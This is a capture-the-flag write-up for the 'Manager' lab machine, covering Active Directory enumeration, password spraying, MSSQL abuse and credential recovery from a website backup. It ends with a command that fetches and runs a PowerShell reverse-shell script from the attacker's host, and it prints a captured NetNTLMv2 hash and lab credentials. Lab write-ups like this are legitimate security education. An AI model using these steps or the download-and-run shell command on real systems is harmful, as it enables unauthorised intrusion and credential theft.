# Manager - HTB

[[_TOC_]]

## Summary

<!-- markdownlint-disable MD033 -->
<div align="center"><img src="images/0.png"></div>

Manager was a fun, medium-rated HTB Windows machine created by [Geiseric](https://twitter.com/geiseric4)

The foothold involves weak credentials, IIS Shortname scanning, and MSSQL.  
For privilege escalation, we exploit ADCS (ESC7).

## Initial recon

```console
opcode@debian$ nmap -v -p- --min-rate 2000 10.10.11.236
Nmap scan report for 10.10.11.236
Host is up (0.075s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
1433/tcp  open  ms-sql-s
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49667/tcp open  unknown
49673/tcp open  unknown
49675/tcp open  unknown
49751/tcp open  unknown
55957/tcp open  unknown
56000/tcp open  unknown
```

```console
opcode@debian$ nmap -sC -sV -p 53,80,88,135,139,389,445,464,593,636,1433,3268,3269,5985,9389,49667,49673,49675,49751,55957,56000 -oN manager.nmap 10.10.11.236
Nmap scan report for 10.10.11.236
Host is up (0.083s latency).

PORT      STATE    SERVICE       VERSION
53/tcp    open     domain        Simple DNS Plus
80/tcp    open     http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Manager
88/tcp    open     kerberos-sec  Microsoft Windows Kerberos (server time: 2024-03-25 16:13:09Z)
135/tcp   open     msrpc         Microsoft Windows RPC
139/tcp   open     netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open     ldap          Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-03-25T16:14:40+00:00; +6h56m58s from scanner time.
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after:  2024-07-29T13:51:28
445/tcp   open     microsoft-ds?
464/tcp   open     kpasswd5?
593/tcp   open     ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open     ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-03-25T16:14:40+00:00; +6h56m59s from scanner time.
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after:  2024-07-29T13:51:28
1433/tcp  open     ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-03-25T16:00:06
|_Not valid after:  2054-03-25T16:00:06
|_ssl-date: 2024-03-25T16:14:40+00:00; +6h56m58s from scanner time.
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
3268/tcp  open     ldap          Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-03-25T16:14:40+00:00; +6h56m58s from scanner time.
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after:  2024-07-29T13:51:28
3269/tcp  open     ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after:  2024-07-29T13:51:28
|_ssl-date: 2024-03-25T16:14:40+00:00; +6h56m59s from scanner time.
5985/tcp  open     http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open     mc-nmf        .NET Message Framing
49667/tcp open     msrpc         Microsoft Windows RPC
49673/tcp open     ncacn_http    Microsoft Windows RPC over HTTP 1.0
49675/tcp open     msrpc         Microsoft Windows RPC
49751/tcp open     msrpc         Microsoft Windows RPC
55957/tcp open     msrpc         Microsoft Windows RPC
56000/tcp filtered unknown
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-03-25T16:14:00
|_  start_date: N/A
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required
|_clock-skew: mean: 6h56m58s, deviation: 0s, median: 6h56m57s
```

DNS, Kerberos, SMB, RPC, LDAP, WinRM, and other ports are open. It's likely a DC.  
Besides the standard AD ports, the MSSQL port is also exposed.

We can start with LDAP enumeration:

```console
opcode@debian$ ldapsearch -x -H ldap://10.10.11.236 -s base -b "" -LLL
dn:
domainFunctionality: 7
forestFunctionality: 7
domainControllerFunctionality: 7
rootDomainNamingContext: DC=manager,DC=htb
ldapServiceName: manager.htb:dc01$@MANAGER.HTB
[--SNIP--]
subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=manager,DC=htb
serverName: CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=manager,DC=htb
schemaNamingContext: CN=Schema,CN=Configuration,DC=manager,DC=htb
namingContexts: DC=manager,DC=htb
namingContexts: CN=Configuration,DC=manager,DC=htb
namingContexts: CN=Schema,CN=Configuration,DC=manager,DC=htb
namingContexts: DC=DomainDnsZones,DC=manager,DC=htb
namingContexts: DC=ForestDnsZones,DC=manager,DC=htb
isSynchronized: TRUE
highestCommittedUSN: 143548
dsServiceName: CN=NTDS Settings,CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=manager,DC=htb
dnsHostName: dc01.manager.htb
defaultNamingContext: DC=manager,DC=htb
currentTime: 20240325162150.0Z
configurationNamingContext: CN=Configuration,DC=manager,DC=htb
```

We have the FQDN `dc01.manager.htb` here; we can add it to `/etc/hosts`:

```text
10.10.11.236 dc01.manager.htb manager.htb dc01
```

Both ports 80 and 443 lead to the default IIS website.  

## IIS Shortname Scanner

The webpage on port 80 is static. The form does not work.  
I tried running [ffuf](https://github.com/ffuf/ffuf), but nothing interesting came up.  
I also tried [IIS Short Name Scanner](https://github.com/irsdl/IIS-ShortName-Scanner)

```console
opcode@debian$ wget https://github.com/irsdl/IIS-ShortName-Scanner/raw/master/release/iis_shortname_scanner.jar
opcode@debian$ wget https://raw.githubusercontent.com/irsdl/IIS-ShortName-Scanner/master/release/config.xml
```

```console
opcode@debian$ java -jar iis_shortname_scanner.jar http://manager.htb
Do you want to use proxy [Y=Yes, Anything Else=No]? N
# IIS Short Name (8.3) Scanner version 2023.4 - scan initiated 2024/03/26 00:47:01
Target: http://manager.htb/
|_ Result: Vulnerable!
|_ Used HTTP method: OPTIONS
|_ Suffix (magic part): /~1/.rem
|_ Extra information:
  |_ Number of sent requests: 27
```

No surprise there.

```console
opcode@debian$ java -jar iis_shortname_scanner.jar 2 20 http://manager.htb/
[--SNIP--]
# IIS Short Name (8.3) Scanner version 2023.4 - scan initiated 2024/03/26 00:49:25
Target: http://manager.htb/
|_ Result: Vulnerable!
|_ Used HTTP method: OPTIONS
|_ Suffix (magic part): /~1/.rem
|_ Extra information:
  |_ Number of sent requests: 825
  |_ Identified directories: 0
  |_ Identified files: 6
    |_ ABOUT~1.HTM
      |_ Actual file name = ABOUT
    |_ CONTAC~1.HTM
    |_ INDEX~1.HTM
      |_ Actual file name = INDEX
    |_ SERVIC~1.HTM
    |_ WEBSIT~1.ZIP
    |_ WEB~1.CON
      |_ Actual file name = WEB
```

A ZIP file is present in webroot. My attempts to guess the exact name were unsuccessful.

## SMB enumeration

We can enumerate SMB shares. [NetExec](https://github.com/Pennyw0rth/NetExec) is my tool of choice these days:

```console
opcode@debian$ docker run -it --entrypoint=/bin/bash --rm --name netexec nxc:latest
root@d7b954ded229:~# echo '10.10.11.236 dc01.manager.htb manager.htb dc01' >> /etc/hosts
```

Testing for null session:

```console
root@d7b954ded229:~# nxc smb 10.10.11.236 -d manager.htb -u '' -p '' --shares
SMB         10.10.11.236    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.236    445    DC01             [+] manager.htb\: 
SMB         10.10.11.236    445    DC01             [-] Error enumerating shares: STATUS_ACCESS_DENIED
```

Null sessions are disabled.

Testing for guest session:

```console
root@d7b954ded229:~# nxc smb 10.10.11.236 -d manager.htb -u 'opcode' -p '' --shares
SMB         10.10.11.236    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.236    445    DC01             [+] manager.htb\opcode: 
SMB         10.10.11.236    445    DC01             [*] Enumerated shares
SMB         10.10.11.236    445    DC01             Share           Permissions     Remark
SMB         10.10.11.236    445    DC01             -----           -----------     ------
SMB         10.10.11.236    445    DC01             ADMIN$                          Remote Admin
SMB         10.10.11.236    445    DC01             C$                              Default share
SMB         10.10.11.236    445    DC01             IPC$            READ            Remote IPC
SMB         10.10.11.236    445    DC01             NETLOGON                        Logon server share 
SMB         10.10.11.236    445    DC01             SYSVOL                          Logon server share 
```

Guest sessions are enabled.  
Since the share `IPC$` is readable, we can perform RID cycling:

```console
root@d7b954ded229:~# nxc smb 10.10.11.236 -d manager.htb -u 'opcode' -p '' --rid-brute 10000
SMB         10.10.11.236    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.236    445    DC01             [+] manager.htb\opcode: 
SMB         10.10.11.236    445    DC01             498: MANAGER\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.236    445    DC01             500: MANAGER\Administrator (SidTypeUser)
SMB         10.10.11.236    445    DC01             501: MANAGER\Guest (SidTypeUser)
SMB         10.10.11.236    445    DC01             502: MANAGER\krbtgt (SidTypeUser)
SMB         10.10.11.236    445    DC01             512: MANAGER\Domain Admins (SidTypeGroup)
SMB         10.10.11.236    445    DC01             513: MANAGER\Domain Users (SidTypeGroup)
SMB         10.10.11.236    445    DC01             514: MANAGER\Domain Guests (SidTypeGroup)
SMB         10.10.11.236    445    DC01             515: MANAGER\Domain Computers (SidTypeGroup)
SMB         10.10.11.236    445    DC01             516: MANAGER\Domain Controllers (SidTypeGroup)
SMB         10.10.11.236    445    DC01             517: MANAGER\Cert Publishers (SidTypeAlias)
SMB         10.10.11.236    445    DC01             518: MANAGER\Schema Admins (SidTypeGroup)
SMB         10.10.11.236    445    DC01             519: MANAGER\Enterprise Admins (SidTypeGroup)
SMB         10.10.11.236    445    DC01             520: MANAGER\Group Policy Creator Owners (SidTypeGroup)
SMB         10.10.11.236    445    DC01             521: MANAGER\Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.236    445    DC01             522: MANAGER\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.10.11.236    445    DC01             525: MANAGER\Protected Users (SidTypeGroup)
SMB         10.10.11.236    445    DC01             526: MANAGER\Key Admins (SidTypeGroup)
SMB         10.10.11.236    445    DC01             527: MANAGER\Enterprise Key Admins (SidTypeGroup)
SMB         10.10.11.236    445    DC01             553: MANAGER\RAS and IAS Servers (SidTypeAlias)
SMB         10.10.11.236    445    DC01             571: MANAGER\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.10.11.236    445    DC01             572: MANAGER\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.10.11.236    445    DC01             1000: MANAGER\DC01$ (SidTypeUser)
SMB         10.10.11.236    445    DC01             1101: MANAGER\DnsAdmins (SidTypeAlias)
SMB         10.10.11.236    445    DC01             1102: MANAGER\DnsUpdateProxy (SidTypeGroup)
SMB         10.10.11.236    445    DC01             1103: MANAGER\SQLServer2005SQLBrowserUser$DC01 (SidTypeAlias)
SMB         10.10.11.236    445    DC01             1113: MANAGER\Zhong (SidTypeUser)
SMB         10.10.11.236    445    DC01             1114: MANAGER\Cheng (SidTypeUser)
SMB         10.10.11.236    445    DC01             1115: MANAGER\Ryan (SidTypeUser)
SMB         10.10.11.236    445    DC01             1116: MANAGER\Raven (SidTypeUser)
SMB         10.10.11.236    445    DC01             1117: MANAGER\JinWoo (SidTypeUser)
SMB         10.10.11.236    445    DC01             1118: MANAGER\ChinHae (SidTypeUser)
SMB         10.10.11.236    445    DC01             1119: MANAGER\Operator (SidTypeUser)
```

The RID values post 1100 refer to non-default users and groups.  

Now that we have a bunch of usernames, we can try roasting AS-REPs:

```console
root@d7b954ded229:~# echo -e 'Zhong\nCheng\nRyan\nRaven\nJinWoo\nChinHae\nOperator' > users.txt
root@d7b954ded229:~# nxc ldap 10.10.11.236 -d manager.htb -u users.txt -p '' --asreproast output.txt
SMB         10.10.11.236    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
```

No leads here. We can also test for weak credentials:

```console
root@d7b954ded229:~# nxc smb 10.10.11.236 -d manager.htb -u users.txt -p ''
SMB         10.10.11.236    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.236    445    DC01             [-] manager.htb\Zhong: STATUS_LOGON_FAILURE 
SMB         10.10.11.236    445    DC01             [-] manager.htb\Cheng: STATUS_LOGON_FAILURE 
SMB         10.10.11.236    445    DC01             [-] manager.htb\Ryan: STATUS_LOGON_FAILURE 
SMB         10.10.11.236    445    DC01             [-] manager.htb\Raven: STATUS_LOGON_FAILURE 
SMB         10.10.11.236    445    DC01             [-] manager.htb\JinWoo: STATUS_LOGON_FAILURE 
SMB         10.10.11.236    445    DC01             [-] manager.htb\ChinHae: STATUS_LOGON_FAILURE 
SMB         10.10.11.236    445    DC01             [-] manager.htb\Operator: STATUS_LOGON_FAILURE 
root@d7b954ded229:~# nxc smb 10.10.11.236 -d manager.htb -u users.txt -p users.txt --no-bruteforce
SMB         10.10.11.236    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.236    445    DC01             [-] manager.htb\Zhong:Zhong STATUS_LOGON_FAILURE 
SMB         10.10.11.236    445    DC01             [-] manager.htb\Cheng:Cheng STATUS_LOGON_FAILURE 
SMB         10.10.11.236    445    DC01             [-] manager.htb\Ryan:Ryan STATUS_LOGON_FAILURE 
SMB         10.10.11.236    445    DC01             [-] manager.htb\Raven:Raven STATUS_LOGON_FAILURE 
SMB         10.10.11.236    445    DC01             [-] manager.htb\JinWoo:JinWoo STATUS_LOGON_FAILURE 
SMB         10.10.11.236    445    DC01             [-] manager.htb\ChinHae:ChinHae STATUS_LOGON_FAILURE 
SMB         10.10.11.236    445    DC01             [-] manager.htb\Operator:Operator STATUS_LOGON_FAILURE 
```

I asked for a hint, and was prompted to convert the usernames to lowercase and then try for passwords same as usernames:

```console
root@d7b954ded229:~# tr '[:upper:]' '[:lower:]' < users.txt > usernames.txt
root@d7b954ded229:~# nxc smb 10.10.11.236 -d manager.htb -u usernames.txt -p usernames.txt --no-bruteforce --continue-on-success
SMB         10.10.11.236    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.236    445    DC01             [-] manager.htb\zhong:zhong STATUS_LOGON_FAILURE 
SMB         10.10.11.236    445    DC01             [-] manager.htb\cheng:cheng STATUS_LOGON_FAILURE 
SMB         10.10.11.236    445    DC01             [-] manager.htb\ryan:ryan STATUS_LOGON_FAILURE 
SMB         10.10.11.236    445    DC01             [-] manager.htb\raven:raven STATUS_LOGON_FAILURE 
SMB         10.10.11.236    445    DC01             [-] manager.htb\jinwoo:jinwoo STATUS_LOGON_FAILURE 
SMB         10.10.11.236    445    DC01             [-] manager.htb\chinhae:chinhae STATUS_LOGON_FAILURE 
SMB         10.10.11.236    445    DC01             [+] manager.htb\operator:operator 
```

## Post-credential AD enumeration

Now that we have a set of credentials, we can enumerate more.  
Starting with SMB shares:

```console
root@d7b954ded229:~# nxc smb 10.10.11.236 -d manager.htb -u 'operator' -p 'operator' --shares
SMB         10.10.11.236    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.236    445    DC01             [+] manager.htb\operator:operator 
SMB         10.10.11.236    445    DC01             [*] Enumerated shares
SMB         10.10.11.236    445    DC01             Share           Permissions     Remark
SMB         10.10.11.236    445    DC01             -----           -----------     ------
SMB         10.10.11.236    445    DC01             ADMIN$                          Remote Admin
SMB         10.10.11.236    445    DC01             C$                              Default share
SMB         10.10.11.236    445    DC01             IPC$            READ            Remote IPC
SMB         10.10.11.236    445    DC01             NETLOGON        READ            Logon server share 
SMB         10.10.11.236    445    DC01             SYSVOL          READ            Logon server share 
```

No new shares are accessible.  
I also check a few other things:

```console
root@d7b954ded229:~# nxc smb 10.10.11.236 -d manager.htb -u 'operator' -p 'operator' -M enum_av
SMB         10.10.11.236    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.236    445    DC01             [+] manager.htb\operator:operator 
ENUM_AV     10.10.11.236    445    DC01             Found Windows Defender INSTALLED

root@d7b954ded229:~# nxc ldap 10.10.11.236 -d manager.htb -u 'operator' -p 'operator' -M adcs
SMB         10.10.11.236    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.236    389    DC01             [+] manager.htb\operator:operator 
ADCS        10.10.11.236    389    DC01             [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'
ADCS                                                Found PKI Enrollment Server: dc01.manager.htb
ADCS                                                Found CN: manager-DC01-CA

root@d7b954ded229:~# nxc ldap 10.10.11.236 -d manager.htb -u 'operator' -p 'operator' -M MAQ
SMB         10.10.11.236    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.236    389    DC01             [+] manager.htb\operator:operator 
MAQ         10.10.11.236    389    DC01             [*] Getting the MachineAccountQuota
MAQ         10.10.11.236    389    DC01             MachineAccountQuota: 0

root@d7b954ded229:~# nxc ldap 10.10.11.236 -d manager.htb -u 'operator' -p 'operator' -M whoami
SMB         10.10.11.236    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.236    389    DC01             [+] manager.htb\operator:operator 
WHOAMI      10.10.11.236    389    DC01             distinguishedName: CN=Operator,CN=Users,DC=manager,DC=htb
WHOAMI      10.10.11.236    389    DC01             name: Operator
WHOAMI      10.10.11.236    389    DC01             Enabled: Yes
WHOAMI      10.10.11.236    389    DC01             Password Never Expires: Yes
WHOAMI      10.10.11.236    389    DC01             Last logon: 133558773153616300
WHOAMI      10.10.11.236    389    DC01             pwdLastSet: 133349449901292129
WHOAMI      10.10.11.236    389    DC01             logonCount: 0
WHOAMI      10.10.11.236    389    DC01             sAMAccountName: Operator
```

And some groups:

```console
root@d7b954ded229:~# nxc ldap 10.10.11.236 -d manager.htb -u 'operator' -p 'operator' -M group-mem -o group='Remote Management Users'
SMB         10.10.11.236    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.236    389    DC01             [+] manager.htb\operator:operator 
GROUP-MEM   10.10.11.236    389    DC01             [+] Found the following members of the Remote Management Users group:
GROUP-MEM   10.10.11.236    389    DC01             Raven

root@d7b954ded229:~# nxc ldap 10.10.11.236 -d manager.htb -u 'operator' -p 'operator' -M group-mem -o group='Domain Admins'
SMB         10.10.11.236    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.236    389    DC01             [+] manager.htb\operator:operator 
GROUP-MEM   10.10.11.236    389    DC01             [+] Found the following members of the Domain Admins group:
GROUP-MEM   10.10.11.236    389    DC01             Administrator

root@d7b954ded229:~# nxc ldap 10.10.11.236 -d manager.htb -u 'operator' -p 'operator' -M group-mem -o group='Protected Users'
SMB         10.10.11.236    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.236    389    DC01             [+] manager.htb\operator:operator

root@d7b954ded229:~# nxc ldap 10.10.11.236 -d manager.htb -u 'operator' -p 'operator' -M group-mem -o group='Domain Computers'
SMB         10.10.11.236    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.236    389    DC01             [+] manager.htb\operator:operator

root@d7b954ded229:~# nxc ldap 10.10.11.236 -d manager.htb -u 'operator' -p 'operator' -M groupmembership -o user='operator'
SMB         10.10.11.236    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.236    389    DC01             [+] manager.htb\operator:operator 
GROUPMEM... 10.10.11.236    389    DC01             [+] User: operator is member of following groups: 
GROUPMEM... 10.10.11.236    389    DC01             Domain Users
```

The user `Raven` is present in the `Remote Management Users` group.  
We cannot get a shell with our current user. This box also has PKI.

I collected Bloodhound data to look for possible paths.

```console
root@d7b954ded229:~# nxc ldap 10.10.11.236 -d manager.htb -u 'operator' -p 'operator' --bloodhound -ns 10.10.11.236 -c All
SMB         10.10.11.236    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.236    389    DC01             [+] manager.htb\operator:operator 
LDAP        10.10.11.236    389    DC01             Resolved collection methods: acl, rdp, session, container, localadmin, dcom, trusts, group, objectprops, psremote
LDAP        10.10.11.236    389    DC01             Done in 00M 38S
LDAP        10.10.11.236    389    DC01             Compressing output into /root/.nxc/logs/DC01_10.10.11.236_2024-03-25_151057_bloodhound.zip
```

I ran `neo4j` and `Bloodhound` but found nothing useful.  
I also enumerated ADCS with `certipy`, but no dice.

## MSSQL Enumeration

The MSSQL port 1433 is exposed, which is unusual.  
[impacket](https://github.com/fortra/impacket)'s `mssqlclient.py` can be user to connect to the database:

```console
opcode@debian$ mssqlclient.py manager.htb/operator:operator@dc01.manager.htb -windows-auth
Impacket v0.12.0.dev1+20231012.22017.2de29184 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (MANAGER\Operator  guest@master)> enum_db
name     is_trustworthy_on   
------   -----------------   
master                   0   
tempdb                   0   
model                    0   
msdb                     1   

SQL (MANAGER\Operator  guest@master)> enum_owner
Database   Owner   
--------   -----   
master     sa      
tempdb     sa      
model      sa      
msdb       sa      

SQL (MANAGER\Operator  guest@master)> enum_impersonate
execute as   database   permission_name   state_desc   grantee   grantor   
----------   --------   ---------------   ----------   -------   -------   
```

I tried `xp_cmdshell` and `sp_start_job`, but they failed.  
I also tried coercion via `xp_dirtree` to get NetNTLMv2 encrypted challenge:

```console
SQL (MANAGER\Operator  guest@master)> xp_dirtree \\10.10.14.119\opcode
subdirectory   depth   file   
------------   -----   ----   
```

I got a challenge, but I don't think it can be cracked:

```text
[SMB] NTLMv2-SSP Client   : 10.10.11.236
[SMB] NTLMv2-SSP Username : MANAGER\DC01$
[SMB] NTLMv2-SSP Hash     : DC01$::MANAGER:d217f45a98c16ba6:CAAC261E4992FF61A2DA1B627A1A72DB:01010000000000000084416D127FDA019773A637C8356894000000000200080031004A005400310001001E00570049004E002D00580044004C003600530044005300440030005400320004003400570049004E002D00580044004C00360053004400530044003000540032002E0031004A00540031002E004C004F00430041004C000300140031004A00540031002E004C004F00430041004C000500140031004A00540031002E004C004F00430041004C00070008000084416D127FDA0106000400020000000800300030000000000000000000000000300000EE0C2E42D1A49482E891DF3A9ADEBDBB8B3FEF48866121277062D8D7AF3DA7280A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310034002E003100310039000000000000000000
```

I also tried [MSSqlPwner](https://github.com/ScorpionesLabs/MSSqlPwner)

```console
opcode@debian$ git clone https://github.com/ScorpionesLabs/MSSqlPwner.git
opcode@debian$ cd MSSqlPwner 
opcode@debian$ python3 -m venv msp
opcode@debian$ source msp/bin/activate
(msp) opcode@debian$ python3 -m pip install -r requirements.txt
```

It can be used after requirements are installed:

```console
(msp) opcode@debian$ python3 MSSqlPwner.py manager.htb/operator:operator@dc01.manager.htb -windows-auth interactive
[*] Connecting to dc01.manager.htb:1433 as operator
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[*] Discovered hostname: DC01
[*] Server information from DC01 (MANAGER\Operator@master/guest) is retrieved
[*] Done!
[*] Enumeration completed successfully
[*] Saving state to file
[*] Chosen linked server: DC01
MSSqlPwner#DC01 (MANAGER\Operator@master/guest)> get-chain-list
[*] Chosen linked server: DC01
[*] Chain list:
[*] c9994fe0-97af-4a6f-a736-9f9731126cc6 - DC01 (MANAGER\Operator@master/guest) (MANAGER\Operator guest@master)
```

Nothing useful here.  
I asked for another hint and was prompted to determine the intended purpose of the `xp_dirtree`  
Apparently, it can retrieve a directory tree listing for a chosen path.  
From the IIS Shortname Scanner, we already know that a ZIP file is present in webroot. We can use `xp_dirtree` to get its precise name.

Back to `mssqlclient.py`,

```console
SQL (MANAGER\Operator  guest@master)> xp_dirtree C:\
subdirectory                depth   file   
-------------------------   -----   ----   
$Recycle.Bin                    1      0   
Documents and Settings          1      0   
inetpub                         1      0   
PerfLogs                        1      0   
Program Files                   1      0   
Program Files (x86)             1      0   
ProgramData                     1      0   
Recovery                        1      0   
SQL2019                         1      0   
System Volume Information       1      0   
Users                           1      0   
Windows                         1      0   
```

```console
SQL (MANAGER\Operator  guest@master)> xp_dirtree C:\inetpub\wwwroot
subdirectory                      depth   file   
-------------------------------   -----   ----   
about.html                            1      1   
contact.html                          1      1   
css                                   1      0   
images                                1      0   
index.html                            1      1   
js                                    1      0   
service.html                          1      1   
web.config                            1      1   
website-backup-27-07-23-old.zip       1      1   
```

With the precise name, we can download it.

```console
opcode@debian$ wget http://manager.htb/website-backup-27-07-23-old.zip
opcode@debian$ unzip -l website-backup-27-07-23-old.zip 
Archive:  website-backup-27-07-23-old.zip
  Length      Date    Time    Name
---------  ---------- -----   ----
      698  2023-07-27 05:35   .old-conf.xml
     5386  2023-07-27 05:32   about.html
     5317  2023-07-27 05:32   contact.html
   192348  2019-02-13 11:17   css/bootstrap.css
[--SNIP--]
     1373  2019-11-21 05:30   images/s-3.png
     1388  2019-11-21 05:30   images/s-4.png
      517  2019-11-21 05:00   images/search-icon.png
    18203  2023-07-27 05:32   index.html
   131863  2020-04-29 09:00   js/bootstrap.js
    88145  2019-08-01 07:03   js/jquery-3.4.1.min.js
     7900  2023-07-27 05:32   service.html
---------                     -------
  1462176                     36 files
```

The `.old-conf.xml` seems juicy:

```console
opcode@debian$ unzip website-backup-27-07-23-old.zip .old-conf.xml
opcode@debian$ cat .old-conf.xml                     
<?xml version="1.0" encoding="UTF-8"?>
<ldap-conf xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
   <server>
      <host>dc01.manager.htb</host>
      <open-port enabled="true">389</open-port>
      <secure-port enabled="false">0</secure-port>
      <search-base>dc=manager,dc=htb</search-base>
      <server-type>microsoft</server-type>
      <access-user>
         <user>raven@manager.htb</user>
         <password>R4v3nBe5tD3veloP3r!123</password>
      </access-user>
      <uid-attribute>cn</uid-attribute>
   </server>
   <search type="full">
      <dir-list>
         <dir>cn=Operator1,CN=users,dc=manager,dc=htb</dir>
      </dir-list>
   </search>
</ldap-conf>
```

It leaks a set of credentials:

```text
raven:R4v3nBe5tD3veloP3r!123
```

Since `raven` belongs to the `Remote Management Users` group, we can get a WinRM shell:

```console
opcode@debian$ docker run -it --entrypoint=/bin/bash --rm --name netexec nxc:latest
root@d7b954ded229:~# nxc winrm 10.10.11.236 -d manager.htb -u 'raven' -p 'R4v3nBe5tD3veloP3r!123' -X 'IEX(IWR http://10.10.14.119:8000/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.10.14.119 9001'
```

